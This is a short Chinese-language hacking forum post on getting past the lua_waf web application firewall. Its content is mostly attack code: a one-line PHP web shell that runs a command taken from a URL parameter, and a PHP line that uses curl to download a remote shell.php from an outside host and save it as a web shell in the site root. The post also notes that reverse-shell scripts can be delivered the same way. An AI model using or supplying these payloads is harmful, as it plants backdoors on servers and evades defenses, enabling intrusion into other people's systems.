搜索
查看: 579|回复: 0

绕过lua_waf防火墙

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-5-23 00:45:33 | 显示全部楼层 |阅读模式
传这么一句代码是完全无害不被拦截的
  1. <?php $x=$_GET[x];echo `$x`;?>
复制代码

这里是不能出现wget的。。。那么就改一下,wget是敏感字的时候就用curl导出
  1. <?php echo `curl http://www.chinabaiker.com/shell.php > /home/www/public_html/webshell.php`;?>
复制代码

包括反弹shell的脚本、大小文件。。都可以这么来。。。就这么简单
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表